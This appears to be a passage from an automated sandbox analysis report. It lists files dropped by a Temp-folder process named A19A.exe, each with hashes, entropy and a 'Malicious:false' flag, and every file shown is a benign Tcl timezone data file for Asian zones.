                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Famagusta) {. {-9223372036854775808 8148 0 LMT}. {-1518920148 7200 0 EET}. {166572000 10800 1 EEST}. {182293200 7200 0 EET}. {200959200 10800 1 EEST}. {213829200 7200 0 EET}. {228866400 10800 1 EEST}. {243982800 7200 0 EET}. {260316000 10800 1 EEST}. {276123600 7200 0 EET}. {291765600 10800 1 EEST}. {307486800 7200 0 EET}. {323820000 10800 1 EEST}. {338936400 7200 0 EET}. {354664800 10800 1 EEST}. {370386000 7200 0 EET}. {386114400 10800 1 EEST}. {401835600 7200 0 EET}. {417564000 10800 1 EEST}. {433285200 7200 0 EET}. {449013600 10800 1 EEST}. {465339600 7200 0 EET}. {481068000 10800 1 EEST}. {496789200 7200 0 EET}. {512517600 10800 1 EEST}. {528238800 7200 0 EET}. {543967200 10800 1 EEST}. {559688400 7200 0 EET}. {575416800 10800 1 EEST}. {591138000 7200 0 EET}. {606866400 10800 1 EEST}. {622587600 7200 0 EET}. {638316000 108
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7974
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.660638074803316
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:uR7CUoVy0FUeLR2S5nfclzdVYi8x6PxGtv2h4WSwLnRPCILXwuiaAXOH4g1iWThA:uRiVy0WetivMKRPCAXwZ6plyk8B
                                                                                                                                                                                                                                                                                                                                MD5:45C8B6CB180839A1F3D500071D1AFC1D
                                                                                                                                                                                                                                                                                                                                SHA1:59E900FB2D7BFF44AED578B9BD10AA0530B4F5D1
                                                                                                                                                                                                                                                                                                                                SHA-256:FA459622B54CD0A5603323EA00CE64D63BBC957EC0BDCC9BE73D48916237619C
                                                                                                                                                                                                                                                                                                                                SHA-512:5F485299D6DF9EBD620D2AEF7BDE21C7505EAD51467699874408691C644E9E6D8C63DD6061489E924B95672A227B5B9921E4281405981FCBBCA4619F80195AB5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Gaza) {. {-9223372036854775808 8272 0 LMT}. {-2185409872 7200 0 EEST}. {-933645600 10800 1 EEST}. {-857358000 7200 0 EEST}. {-844300800 10800 1 EEST}. {-825822000 7200 0 EEST}. {-812685600 10800 1 EEST}. {-794199600 7200 0 EEST}. {-779853600 10800 1 EEST}. {-762656400 7200 0 EEST}. {-748310400 10800 1 EEST}. {-731127600 7200 0 EEST}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 1
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.814799933523261
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qvwVAIgNtA2WFKwHp4WFKdv:SlSWB9IZaM3yMwVAIgE2wKi4wKt
                                                                                                                                                                                                                                                                                                                                MD5:2B286E58F2214F7A28D2A678B905CFA3
                                                                                                                                                                                                                                                                                                                                SHA1:A76B2D8BA2EA264FE84C5C1ED3A6D3E13288132F
                                                                                                                                                                                                                                                                                                                                SHA-256:6917C89A78ED54DD0C5C9968E5149D42727A9299723EC1D2EBD531A65AD37227
                                                                                                                                                                                                                                                                                                                                SHA-512:0022B48003FE9C8722FD1762FFB8E07E731661900FCE40BD6FE82B70F162FF5D32888028519D51682863ADCAC6DD21D35634CA06489FD4B704DA5A8A018BF26F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7950
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6634483349947593
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:JrCUoVy0FUeLR2S5nfclzdVYi8x6PxGtv2h4WFwLnRPCILXwuiaAXOH4g1iWThiD:JyVy0WetivMvRPCAXwZ6plyk8B
                                                                                                                                                                                                                                                                                                                                MD5:67602731E9D02418D0B1DCBCB9367870
                                                                                                                                                                                                                                                                                                                                SHA1:13D896B6B8B553879D70BFBA6734AFDFE3A522A4
                                                                                                                                                                                                                                                                                                                                SHA-256:9D89F879C6F47F05015C8B7D66639AAC8AF2D5A6F733CDA60CFF22EB0EB71221
                                                                                                                                                                                                                                                                                                                                SHA-512:ECA8EB42144EF4097E606AC57795491248D02C331CE426E7C23D42490F873CD19924F1C2318E2FF1D18E275F3CAD60E9DFBB08B4B8334EA3FF1EE31452B9E167
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hebron) {. {-9223372036854775808 8423 0 LMT}. {-2185410023 7200 0 EEST}. {-933645600 10800 1 EEST}. {-857358000 7200 0 EEST}. {-844300800 10800 1 EEST}. {-825822000 7200 0 EEST}. {-812685600 10800 1 EEST}. {-794199600 7200 0 EEST}. {-779853600 10800 1 EEST}. {-762656400 7200 0 EEST}. {-748310400 10800 1 EEST}. {-731127600 7200 0 EEST}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):381
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.352557338100764
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKKACm2OHAT1P3XTxYCMVSYv/lTkd+zvScCBcFVtQvMVSYv/vMUEkB5:MBp52SmdHqP3tYZF/Cd+zHCBiVikF/v9
                                                                                                                                                                                                                                                                                                                                MD5:41EF18FF071B8541A5CA830C131B22D3
                                                                                                                                                                                                                                                                                                                                SHA1:65E502FD93FE025FD7B358B2953335F4B41BBC68
                                                                                                                                                                                                                                                                                                                                SHA-256:95525205BC65B8DB626EF5257F6C3A93A4902AB6415C080EE67399B41D9AD7AA
                                                                                                                                                                                                                                                                                                                                SHA-512:3889199D84CE456CC7231B0A81CCA7F4C976ED13015869BF486078075F24687C588F9FB52E09744ED4763CA71CC869048C588CDD42C2EA195A9B04EB9C18A123
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ho_Chi_Minh) {. {-9223372036854775808 25600 0 LMT}. {-2004073600 25590 0 PLMT}. {-1851577590 25200 0 +07}. {-852105600 28800 0 +08}. {-782643600 32400 0 +09}. {-767869200 25200 0 +07}. {-718095600 28800 0 +08}. {-457776000 25200 0 +07}. {-315648000 28800 0 +08}. {171820800 25200 0 +07}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2150
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.923186571913929
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQPeCtKkjz1lk/mJURqMJDHxyOPq8vWhV0Z8dX83FdX1BzX4JX/v9YsKP2ieGklq:5tK+Zlim0nltdT1BD45X+iA3tnN7
                                                                                                                                                                                                                                                                                                                                MD5:BBA59A5886F48DCEC5CEFDB689D36880
                                                                                                                                                                                                                                                                                                                                SHA1:8207DE6AB5F7EC6077506ED3AE2EEA3AB35C5FAE
                                                                                                                                                                                                                                                                                                                                SHA-256:F66F0F161B55571CC52167427C050327D4DB98AD58C6589FF908603CD53447F0
                                                                                                                                                                                                                                                                                                                                SHA-512:D071D97E6773FC22ABCCE3C8BE133E0FDA40C385234FEB23F69C84ABB9042E319D6891BD9CA65F2E0A048E6F374DB91E8880DCD9711A86B79A3A058517A3DBFA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hong_Kong) {. {-9223372036854775808 27402 0 LMT}. {-2056693002 28800 0 HKT}. {-907389000 32400 1 HKST}. {-891667800 28800 0 HKT}. {-884246400 32400 0 JST}. {-766746000 28800 0 HKT}. {-747981000 32400 1 HKST}. {-728544600 28800 0 HKT}. {-717049800 32400 1 HKST}. {-694503000 28800 0 HKT}. {-683785800 32400 1 HKST}. {-668064600 28800 0 HKT}. {-654755400 32400 1 HKST}. {-636615000 28800 0 HKT}. {-623305800 32400 1 HKST}. {-605165400 28800 0 HKT}. {-591856200 32400 1 HKST}. {-573715800 28800 0 HKT}. {-559801800 32400 1 HKST}. {-542352600 28800 0 HKT}. {-528352200 32400 1 HKST}. {-510211800 28800 0 HKT}. {-498112200 32400 1 HKST}. {-478762200 28800 0 HKT}. {-466662600 32400 1 HKST}. {-446707800 28800 0 HKT}. {-435213000 32400 1 HKST}. {-415258200 28800 0 HKT}. {-403158600 32400 1 HKST}. {-383808600 28800 0 HKT}. {-371709000 32400 1 HKST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1528
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.661748285763298
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQxEecP9NQwOkN/DN9yinNQHhNY0NVgN8wNy7nNA8eZN0vNb7NBN5pNUckNBe/v9:5MjQwJ/pMiNQXYGVy8iy7NA8ev0VbxX3
                                                                                                                                                                                                                                                                                                                                MD5:6CF9D198D7CC1F0E16DDFE91A6B4A1A5
                                                                                                                                                                                                                                                                                                                                SHA1:D1DEE309E479271CDC3A306272CF4D94367EC68A
                                                                                                                                                                                                                                                                                                                                SHA-256:7E189D7937E5B41CD94AB5208E40C645BE678F2A4F4B02EE1305595E5296E3D0
                                                                                                                                                                                                                                                                                                                                SHA-512:56488F1DD1C694457FC7F8B13550B3D2B3BC737241E311783135115E2BD585FDD083A5146488A121BC02CC1F05EF40C05A88EED1AF391FB9E4653C1F25CC4AF7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hovd) {. {-9223372036854775808 21996 0 LMT}. {-2032927596 21600 0 +06}. {252439200 25200 0 +07}. {417978000 28800 1 +07}. {433785600 25200 0 +07}. {449600400 28800 1 +07}. {465321600 25200 0 +07}. {481050000 28800 1 +07}. {496771200 25200 0 +07}. {512499600 28800 1 +07}. {528220800 25200 0 +07}. {543949200 28800 1 +07}. {559670400 25200 0 +07}. {575398800 28800 1 +07}. {591120000 25200 0 +07}. {606848400 28800 1 +07}. {622569600 25200 0 +07}. {638298000 28800 1 +07}. {654624000 25200 0 +07}. {670352400 28800 1 +07}. {686073600 25200 0 +07}. {701802000 28800 1 +07}. {717523200 25200 0 +07}. {733251600 28800 1 +07}. {748972800 25200 0 +07}. {764701200 28800 1 +07}. {780422400 25200 0 +07}. {796150800 28800 1 +07}. {811872000 25200 0 +07}. {828205200 28800 1 +07}. {843926400 25200 0 +07}. {859654800 28800 1 +07}. {875376000 25200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2017
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6386982097761646
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:5ykBJaTcSANEWiLwyyzLyonofMQa3go8h8PNhRHbsb0k4xiRhIsJ2sbA:BB656ofU5ARdN8
                                                                                                                                                                                                                                                                                                                                MD5:E4995DD6F78F859B17952F15DB554ADC
                                                                                                                                                                                                                                                                                                                                SHA1:19D4957E2A8CC17BCA7F020E4DF411F0E3AC8B49
                                                                                                                                                                                                                                                                                                                                SHA-256:122FEB27760CC2CD714531CF68E6C77F8505E9CA11A147DDA649E2C98E150494
                                                                                                                                                                                                                                                                                                                                SHA-512:A36B334E72C9D0854F0DE040EEEBF7B92E537F770D4EEBB1697AB9DD6AB00E678BE58A7CE2514A4667BA2B8760625C22D21AFE3AB80C5B1DBB7C10E91CDDDB3A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Irkutsk) {. {-9223372036854775808 25025 0 LMT}. {-2840165825 25025 0 IMT}. {-1575874625 25200 0 +07}. {-1247554800 28800 0 +09}. {354902400 32400 1 +09}. {370710000 28800 0 +08}. {386438400 32400 1 +09}. {402246000 28800 0 +08}. {417974400 32400 1 +09}. {433782000 28800 0 +08}. {449596800 32400 1 +09}. {465328800 28800 0 +08}. {481053600 32400 1 +09}. {496778400 28800 0 +08}. {512503200 32400 1 +09}. {528228000 28800 0 +08}. {543952800 32400 1 +09}. {559677600 28800 0 +08}. {575402400 32400 1 +09}. {591127200 28800 0 +08}. {606852000 32400 1 +09}. {622576800 28800 0 +08}. {638301600 32400 1 +09}. {654631200 28800 0 +08}. {670356000 25200 0 +08}. {670359600 28800 1 +08}. {686084400 25200 0 +07}. {695761200 28800 0 +09}. {701805600 32400 1 +09}. {717530400 28800 0 +08}. {733255200 32400 1 +09}. {748980000 28800 0 +08}. {764704800
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):182
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853387718159342
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV0XaDvFVAIgoq3XPHt2WFK4HB/8QaqXNn:SlSWB9IZaM3ymQazFVAIgoQPHt2wK4HJ
                                                                                                                                                                                                                                                                                                                                MD5:7EC8D7D32DC13BE15122D8E26C55F9A2
                                                                                                                                                                                                                                                                                                                                SHA1:5B07C7161F236DF34B0FA83007ECD75B6435F420
                                                                                                                                                                                                                                                                                                                                SHA-256:434B8D0E3034656B3E1561615CCA192EFA62942F285CD59338313710900DB6CB
                                                                                                                                                                                                                                                                                                                                SHA-512:D8F1999AF509871C0A7184CFEFB0A50C174ABDE218330D9CDC784C7599A655AD55F6F2173096EA91EE5700B978B9A94BBFCA41970206E7ADEB804D0EE03B45ED
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):357
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4086954127843585
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKcr6m2OHATJesaSY4SMNkc5q/MVSSmWSyvScCAdMVSSo1CkDF4mMVt:MBp52E6mdHjkAc5aMxdSyHCQMxoRDF4d
                                                                                                                                                                                                                                                                                                                                MD5:88C82B18565C27E050074AD02536D257
                                                                                                                                                                                                                                                                                                                                SHA1:9A150FCD9FAA0E903D70A719D949D00D82F531E3
                                                                                                                                                                                                                                                                                                                                SHA-256:BC07AE610EF38F63EFF384E0815F6F64E79C61297F1C21469B2C5F19679CEAFB
                                                                                                                                                                                                                                                                                                                                SHA-512:29152E0359BC0FB8648BC959DE01D0BCCD17EB928AE000FF77958E7F00FF7D65BFD2C740B438E114D53ABA260B7855B2695EF7C0484850A77FFF34F7A0B255CC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jakarta) {. {-9223372036854775808 25632 0 LMT}. {-3231299232 25632 0 BMT}. {-1451719200 26400 0 +0720}. {-1172906400 27000 0 +0730}. {-876641400 32400 0 +09}. {-766054800 27000 0 +0730}. {-683883000 28800 0 +08}. {-620812800 27000 0 +0730}. {-189415800 25200 0 WIB}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):205
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.7830039894710366
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9X52wKcjm2OHG4YVkcfvScCvowkVcrd1CV4zvhL:MBp52omdHNYacfHCvop2BMVkV
                                                                                                                                                                                                                                                                                                                                MD5:3C073BD9DFD2C4F9BC95C8A94652FF5D
                                                                                                                                                                                                                                                                                                                                SHA1:F4084CDFC025B3A21092DE18DD8ECAFCA5F0EBBB
                                                                                                                                                                                                                                                                                                                                SHA-256:82FC06E73477EBB50C894244C91E613BF3551053359798F42F2F2C913730A470
                                                                                                                                                                                                                                                                                                                                SHA-512:7E79E4425A0D855AAE8DCF5C7196AABE8E75D92CD9B65C61B82B31B29395D4A5F2D8B1E90454037753D03A1BDDE44E8F15D7E999E65C49BE8E8F8A2B2C4EECD0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jayapura) {. {-9223372036854775808 33768 0 LMT}. {-1172913768 32400 0 +09}. {-799491600 34200 0 +0930}. {-189423000 32400 0 WIT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7690
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.684387169764595
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:GzmnxfFtWR8fKnG/QvW+tCE5nfclzdVYi8x6PxGtv2TiGuyLsbAicBnKqXRGlGrz:0mKivDivbOKWKwX5BrAZp0
                                                                                                                                                                                                                                                                                                                                MD5:4C37DF27AB1E906CC624A62288847BA8
                                                                                                                                                                                                                                                                                                                                SHA1:BE690D3958A4A6722ABDF047BF22ACEC8B6D6AFE
                                                                                                                                                                                                                                                                                                                                SHA-256:F10DF7378FF71EDA45E8B1C007A280BBD4629972D12EAB0C6BA7623E98AAFA17
                                                                                                                                                                                                                                                                                                                                SHA-512:B14F5FB330078A564796114FA6804EA12CE0AD6B2DF6D871FF6E7B416425B12FFD6B4E8511FCD55609FBCE95C8EDFF1E14B1C8C505F4B5B66F47EA52FD53F307
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jerusalem) {. {-9223372036854775808 8454 0 LMT}. {-2840149254 8440 0 JMT}. {-1641003640 7200 0 IST}. {-933645600 10800 1 IDT}. {-857358000 7200 0 IST}. {-844300800 10800 1 IDT}. {-825822000 7200 0 IST}. {-812685600 10800 1 IDT}. {-794199600 7200 0 IST}. {-779853600 10800 1 IDT}. {-762656400 7200 0 IST}. {-748310400 10800 1 IDT}. {-731127600 7200 0 IST}. {-681962400 14400 1 IDDT}. {-673243200 10800 1 IDT}. {-667962000 7200 0 IST}. {-652327200 10800 1 IDT}. {-636426000 7200 0 IST}. {-622087200 10800 1 IDT}. {-608947200 7200 0 IST}. {-591847200 10800 1 IDT}. {-572486400 7200 0 IST}. {-558576000 10800 1 IDT}. {-542851200 7200 0 IST}. {-527731200 10800 1 IDT}. {-514425600 7200 0 IST}. {-490845600 10800 1 IDT}. {-482986800 7200 0 IST}. {-459475200 10800 1 IDT}. {-451537200 7200 0 IST}. {-428551200 10800 1 IDT}. {-418262400 7200 0 IST}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):173
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.804360783547797
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52WFKTwkXGm2OHodFxsYvXgVHURRNVsRYvFFqdj/cXHFOVRWh:SlSWB9X52wKTEm2OHoH+YPgVHURbSQF9
                                                                                                                                                                                                                                                                                                                                MD5:9A8CCA0B4337CB6FA15BF1A4F01F6C22
                                                                                                                                                                                                                                                                                                                                SHA1:A4C72FC1EF6EEBDBB5C8C698BCB298DFB5061726
                                                                                                                                                                                                                                                                                                                                SHA-256:4F266D90C413FA44DFCA5BE13E45C00428C694AC662CB06F2451CC3FF08E080F
                                                                                                                                                                                                                                                                                                                                SHA-512:E8074AA0D8B15EE33D279C97A01FF69451A99C7711FFD66B3E9B6B6B021DE957A63F6B747C7A63E3F3C1241E0A2687D81E780D6B54228EE6B7EB9040D7F06A60
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kabul) {. {-9223372036854775808 16608 0 LMT}. {-2524538208 14400 0 +04}. {-788932800 16200 0 +0430}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1989
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6993158455985338
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQ+3e8/HklxL7/Fpd2kNNxLcULBQdHl2yYvpQ62itgUiRrn5d6kGFF6UERWkBUHA:5c/HezFvpchKvW62XPdXJMwT3Lea
                                                                                                                                                                                                                                                                                                                                MD5:496BD39D36218DF67279DA8DE9C7457B
                                                                                                                                                                                                                                                                                                                                SHA1:8AE6E5CF7E1E693D11A112B75A0D24A135E94487
                                                                                                                                                                                                                                                                                                                                SHA-256:6B757333C12F2BFE782258D7E9126ECE0E62696EF9C24B2955A791145D6780E9
                                                                                                                                                                                                                                                                                                                                SHA-512:BADBF7893825F6C7053A23A7AA11B45A2EDBECC4580695BB6B8E568B7FFE5ED72BF61019F3CB6D7B8E663ACAF099F26E266450EC03F3C6B2F8E34BA0D12D100A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kamchatka) {. {-9223372036854775808 38076 0 LMT}. {-1487759676 39600 0 +11}. {-1247569200 43200 0 +13}. {354888000 46800 1 +13}. {370695600 43200 0 +12}. {386424000 46800 1 +13}. {402231600 43200 0 +12}. {417960000 46800 1 +13}. {433767600 43200 0 +12}. {449582400 46800 1 +13}. {465314400 43200 0 +12}. {481039200 46800 1 +13}. {496764000 43200 0 +12}. {512488800 46800 1 +13}. {528213600 43200 0 +12}. {543938400 46800 1 +13}. {559663200 43200 0 +12}. {575388000 46800 1 +13}. {591112800 43200 0 +12}. {606837600 46800 1 +13}. {622562400 43200 0 +12}. {638287200 46800 1 +13}. {654616800 43200 0 +12}. {670341600 39600 0 +12}. {670345200 43200 1 +12}. {686070000 39600 0 +11}. {695746800 43200 0 +13}. {701791200 46800 1 +13}. {717516000 43200 0 +12}. {733240800 46800 1 +13}. {748965600 43200 0 +12}. {764690400 46800 1 +13}. {780415200
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):441
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.32891547054552
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52SmdH35S6DvjRQ+vjjEn6S7Pictk6a2iW6oNl:cQSe3pjRQ+jjE6S7lTh
                                                                                                                                                                                                                                                                                                                                MD5:7A7CFCB7273FCAE33F77048F225BBBBD
                                                                                                                                                                                                                                                                                                                                SHA1:44701B91CBC61FCAC8EEB6E67BCCA0403E9FDD7E
                                                                                                                                                                                                                                                                                                                                SHA-256:9F8C46E5AC4DF691DDCB13C853660915C94316E73F74DD36AF889D5137F1761B
                                                                                                                                                                                                                                                                                                                                SHA-512:44D5A0656032D61152C98B92E3ACA88197A73D87E2D0E8853D6A0E430BDF9290D3B718F9E5864840A6FFA59CDC0D4D47BCEE0471F176E62A05C1083CB35BEBB1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Karachi) {. {-9223372036854775808 16092 0 LMT}. {-1988166492 19800 0 +0530}. {-862637400 23400 1 +0630}. {-764145000 19800 0 +0530}. {-576135000 18000 0 +05}. {38775600 18000 0 PKT}. {1018119600 21600 1 PKST}. {1033840800 18000 0 PKT}. {1212260400 21600 1 PKST}. {1225476000 18000 0 PKT}. {1239735600 21600 1 PKST}. {1257012000 18000 0 PKT}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):169
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.920527043039276
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8s4YkdVAIgNrMvN2WFKu3e2WFKjvn:SlSWB9IZaM3yMGdVAIgWvN2wKulwKjvn
                                                                                                                                                                                                                                                                                                                                MD5:9A66108527388564A9FBDB87D586105F
                                                                                                                                                                                                                                                                                                                                SHA1:945E043A3CC45A4654C2D745A48E1D15F80A3CB5
                                                                                                                                                                                                                                                                                                                                SHA-256:E2965AF4328FB065A82E8A21FF342C29A5942C2EDD304CE1C9087A23A91B65E1
                                                                                                                                                                                                                                                                                                                                SHA-512:C3985D972AFB27E194CBE117E6CF8C45AA5A1B6504133FF85D52E8024387133D11F9EE7238FF87DC1D96F140B9467E6DB3F99B0B98299E6782A643288ABD3308
                                                                                                                                                                                                                                                                                                                                Malicious:false
